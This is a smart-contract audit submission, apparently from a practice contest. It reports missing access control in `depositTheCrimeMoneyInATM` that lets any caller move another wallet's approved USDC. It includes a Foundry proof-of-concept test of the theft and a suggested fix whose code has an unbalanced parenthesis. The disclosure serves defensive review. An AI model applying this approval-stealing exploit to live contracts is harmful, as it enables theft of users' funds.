Submission Details
Severity:
Insecure access control in `Laundrette::depositTheCrimeMoneyInATM` function,, causing anyone can move USDC in other's wallet
Description
The function Laundrette::depositTheCrimeMoneyInATM allows an external caller to set arbitrary account parameter. And USDC will be transferred from this account address. User may lose USDC beacuse of this.
Impact
An attacker can call this function and set account to be any address with remaining USDC allowance, and set to to be himself (or anyone's address), to steal USDC from account address. The attacker can later withdraw USDC by burning crimeMoney.
Proof of Concept
function test_depositOtherUSDC() public {
address alice = makeAddr("alice");
address bob = makeAddr("bob");
vm.prank(godFather);
usdc.transfer(alice, 100e6);
vm.prank(alice);
usdc.approve(address(moneyShelf), 100e6);
joinGangGodFather();
joinGang(bob);
vm.prank(bob);
laundrette.depositTheCrimeMoneyInATM(alice, bob, 100e6);
assertEq(usdc.balanceOf(alice), 0);
assertEq(usdc.balanceOf(address(moneyShelf)), 100e6);
assertEq(crimeMoney.balanceOf(bob), 100e6);
}
Recommendations
ensure the caller is same as account parameter, revert otherwise
function depositTheCrimeMoneyInATM(address account, address to, uint256 amount) external {
++ if (!(account == msg.sender) {
++ revert("Laundrette: you are not authorized to call this function");
++ }
moneyShelf.depositUSDC(account, to, amount);
}
Updates
Lead Judging Commences
n0kto about 1 year ago
Submission Judgement Published Assigned finding tags:
Arbitrary account deposit, steal approval
Rewards breakdown
nSLOC
205This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.